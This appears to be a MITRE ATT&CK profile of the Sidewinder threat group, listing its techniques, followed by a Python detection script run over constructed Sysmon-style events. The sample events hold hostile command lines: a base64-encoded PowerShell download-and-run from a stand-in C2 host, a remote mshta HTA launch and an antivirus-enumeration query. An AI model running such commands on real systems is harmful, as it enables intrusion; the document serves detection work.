G0121 Sidewinder
Sidewinder is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan.[3][2][1]
Item | Value |
---|---|
ID | G0121 |
Associated Names | T-APT-04, Rattlesnake |
Version | 1.1 |
Created | 27 January 2021 |
Last Modified | 22 March 2023 |
Navigation Layer | View In ATT&CK® Navigator |
Associated Group Descriptions
Name | Description |
---|---|
T-APT-04 | [1] |
Rattlesnake | [1] |
Techniques Used
Domain | ID | Name | Use |
---|---|---|---|
enterprise | T1071 | Application Layer Protocol | - |
enterprise | T1071.001 | Web Protocols | Sidewinder has used HTTP in C2 communications.[3][5][4] |
enterprise | T1119 | Automated Collection | Sidewinder has used tools to automatically collect system and network configuration information.[3] |
enterprise | T1020 | Automated Exfiltration | Sidewinder has configured tools to automatically send collected files to attacker-controlled servers.[3] |
enterprise | T1547 | Boot or Logon Autostart Execution | - |
enterprise | T1547.001 | Registry Run Keys / Startup Folder | Sidewinder has added paths to executables in the Registry to establish persistence.[5][4][1] |
enterprise | T1059 | Command and Scripting Interpreter | - |
enterprise | T1059.001 | PowerShell | Sidewinder has used PowerShell to drop and execute malware loaders.[3] |
enterprise | T1059.005 | Visual Basic | Sidewinder has used VBScript to drop and execute malware loaders.[3] |
enterprise | T1059.007 | JavaScript | Sidewinder has used JavaScript to drop and execute malware loaders.[3][4] |
enterprise | T1074 | Data Staged | - |
enterprise | T1074.001 | Local Data Staging | Sidewinder has collected stolen files in a temporary folder in preparation for exfiltration.[3] |
enterprise | T1203 | Exploitation for Client Execution | Sidewinder has exploited vulnerabilities to gain execution, including CVE-2017-11882 (Microsoft Office Equation Editor) and CVE-2020-0674 (Internet Explorer scripting engine).[3][1] |
enterprise | T1083 | File and Directory Discovery | Sidewinder has used malware to collect information on files and directories.[3] |
enterprise | T1574 | Hijack Execution Flow | - |
enterprise | T1574.002 | DLL Side-Loading | Sidewinder has used DLL side-loading to drop and execute malicious payloads, including hijacking the legitimate Windows application rekeywiz.exe.[3] |
enterprise | T1105 | Ingress Tool Transfer | Sidewinder has used LNK files to download remote files to the victim's network.[3][1] |
enterprise | T1559 | Inter-Process Communication | - |
enterprise | T1559.002 | Dynamic Data Exchange | Sidewinder has used the ActiveXObject utility to create OLE objects to obtain execution through Internet Explorer.[5][4] |
enterprise | T1036 | Masquerading | - |
enterprise | T1036.005 | Match Legitimate Name or Location | Sidewinder has named malicious files rekeywiz.exe to match the name of a legitimate Windows executable.[4] |
enterprise | T1027 | Obfuscated Files or Information | Sidewinder has used base64 encoding and ECDH-P256 encryption for payloads.[3][5][1] |
enterprise | T1027.010 | Command Obfuscation | Sidewinder has used base64 encoding for scripts.[3][5] |
enterprise | T1566 | Phishing | - |
enterprise | T1566.001 | Spearphishing Attachment | Sidewinder has sent e-mails with malicious attachments, often crafted for specific targets.[3] |
enterprise | T1566.002 | Spearphishing Link | Sidewinder has sent e-mails with malicious links, often crafted for specific targets.[3][1] |
enterprise | T1598 | Phishing for Information | - |
enterprise | T1598.002 | Spearphishing Attachment | Sidewinder has sent e-mails with malicious attachments that lead victims to credential harvesting websites.[3][5][1] |
enterprise | T1598.003 | Spearphishing Link | Sidewinder has sent e-mails with malicious links to credential harvesting websites.[3] |
enterprise | T1057 | Process Discovery | Sidewinder has used tools to identify running processes on the victim's machine.[3] |
enterprise | T1518 | Software Discovery | Sidewinder has used tools to enumerate software installed on an infected host.[3][5] |
enterprise | T1518.001 | Security Software Discovery | Sidewinder has queried the WMI namespace winmgmts:\\.\root\SecurityCenter2 to check installed antivirus products.[5] |
enterprise | T1218 | System Binary Proxy Execution | - |
enterprise | T1218.005 | Mshta | Sidewinder has used mshta.exe to execute malicious payloads.[5][4] |
enterprise | T1082 | System Information Discovery | Sidewinder has used tools to collect the computer name, OS version, installed hotfixes, and information regarding the memory and processor on a compromised host.[3][4] |
enterprise | T1016 | System Network Configuration Discovery | Sidewinder has used malware to collect information on network interfaces, including the MAC address.[3] |
enterprise | T1033 | System Owner/User Discovery | Sidewinder has used tools to identify the user of a compromised host.[3] |
enterprise | T1124 | System Time Discovery | Sidewinder has used tools to obtain the current system time.[3] |
enterprise | T1204 | User Execution | - |
enterprise | T1204.001 | Malicious Link | Sidewinder has lured targets to click on malicious links to gain execution in the target environment.[3][5][4][1] |
enterprise | T1204.002 | Malicious File | Sidewinder has lured targets to click on malicious files to gain execution in the target environment.[3][5][4][1] |
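Several rows in the table above (Mshta, DLL side-loading of rekeywiz.exe, Registry Run key persistence, base64-encoded PowerShell, and the SecurityCenter2 antivirus check) describe behaviour that is visible in ordinary endpoint telemetry. The script below is an added example, not code from the ATT&CK page or from any of the cited reports: it runs simple detection rules for those techniques over constructed Sysmon-style events (process create, image load, registry value set). The host names, user paths, loader DLL name and SID in the sample events are hypothetical.

```python
"""Detection sketch for the Sidewinder tradecraft listed in the table above.

Added example, not code from the ATT&CK page or any vendor report. The events
are constructed Sysmon-style records (EventID 1 = process create, 7 = image
loaded, 13 = registry value set) using Sysmon's field names; every host name,
path, DLL name and SID in them is hypothetical.
"""
import base64
import re
from typing import Dict, List, Tuple

Finding = Tuple[str, str, str]   # (ATT&CK technique ID, subject, evidence)

# Where a genuine rekeywiz.exe, and any DLL it legitimately loads, should live.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# PowerShell's -EncodedCommand takes base64 of a UTF-16LE string; build one
# the way a dropper would (constructed sample, hypothetical host name).
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/l.ps1')"
    .encode("utf-16-le")).decode()

SAMPLE_EVENTS: List[Dict[str, str]] = [
    # T1218.005: mshta.exe launched from Internet Explorer with a remote HTA.
    {"EventID": "1", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": "mshta.exe http://c2.example.invalid/a.hta"},
    # T1036.005 / T1574.002: rekeywiz.exe copied to a user-writable folder and
    # loading a DLL (hypothetical name) from that same folder.
    {"EventID": "1", "Image": r"C:\Users\u\AppData\Roaming\rekeywiz.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "rekeywiz.exe"},
    {"EventID": "7", "Image": r"C:\Users\u\AppData\Roaming\rekeywiz.exe",
     "ImageLoaded": r"C:\Users\u\AppData\Roaming\loader.dll"},
    # T1547.001: Run key value pointing at the copied binary.
    {"EventID": "13",
     "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
                     r"\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\u\AppData\Roaming\rekeywiz.exe"},
    # T1027.010: base64-encoded PowerShell started by a VBScript stage.
    {"EventID": "1", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED},
    # T1518.001: SecurityCenter2 query for installed antivirus products.
    {"EventID": "1", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName"},
    # Benign controls that must not fire: the real binary, and a Run entry
    # pointing into System32.
    {"EventID": "1", "Image": r"C:\Windows\System32\rekeywiz.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "rekeywiz.exe"},
    {"EventID": "13", "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "Details": r"C:\Windows\System32\SecurityHealthSystray.exe"},
]

ENC_FLAG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
MSHTA_REMOTE = re.compile(r"https?://|\.hta\b|(?:java|vb)script:", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.I)


def _in_system_dir(path: str) -> bool:
    return path.lower().startswith(SYSTEM_DIRS)


def decode_encoded_command(b64: str) -> str:
    """Recover the script text behind -EncodedCommand (base64 of UTF-16LE)."""
    raw = base64.b64decode(b64, validate=True)
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return raw.decode("latin-1")   # not UTF-16 after all; keep it readable


def detect(events: List[Dict[str, str]]) -> List[Finding]:
    """Apply one rule per technique and return every match in event order."""
    findings: List[Finding] = []
    for e in events:
        eid, image = e.get("EventID"), e.get("Image", "")
        name = image.rsplit("\\", 1)[-1].lower()
        if eid == "1":
            cmd = e.get("CommandLine", "")
            if name == "mshta.exe" and MSHTA_REMOTE.search(cmd):
                findings.append(("T1218.005", image, cmd))
            if name == "rekeywiz.exe" and not _in_system_dir(image):
                findings.append(("T1036.005", image, cmd))
            if name in ("powershell.exe", "pwsh.exe") and (m := ENC_FLAG.search(cmd)):
                findings.append(("T1027.010", image, decode_encoded_command(m.group(1))))
            if "securitycenter2" in cmd.lower():
                findings.append(("T1518.001", image, cmd))
        elif eid == "7":
            loaded = e.get("ImageLoaded", "")
            if name == "rekeywiz.exe" and not _in_system_dir(loaded):
                findings.append(("T1574.002", image, loaded))
        elif eid == "13":
            target, details = e.get("TargetObject", ""), e.get("Details", "")
            if RUN_KEY.search(target) and not _in_system_dir(details):
                findings.append(("T1547.001", target, details))
    return findings


if __name__ == "__main__":
    for technique, subject, evidence in detect(SAMPLE_EVENTS):
        print(f"{technique}: {subject} -> {evidence}")
```

The rules key on location rather than name alone: a rekeywiz.exe in System32 and a Run value that points into System32 are left alone, while the same file name under a user profile, or a DLL loaded from the profile directory, is flagged. Decoding the `-enc` payload matters because the base64 blob itself carries nothing a string match can use; the decoded text is what an analyst will pivot on.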
Software
References
[1] Cyble. (2020, September 26). SideWinder APT Targets with futuristic Tactics and Techniques. Retrieved January 29, 2021.
[2] Global Research and Analysis Team. (2018, April 12). APT Trends report Q1 2018. Retrieved January 27, 2021.
[3] Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021.
[4] Rewterz. (2020, June 22). Analysis on Sidewinder APT Group – COVID-19. Retrieved January 29, 2021.
[5] Rewterz. (2020, April 20). Sidewinder APT Group Campaign Analysis. Retrieved January 29, 2021.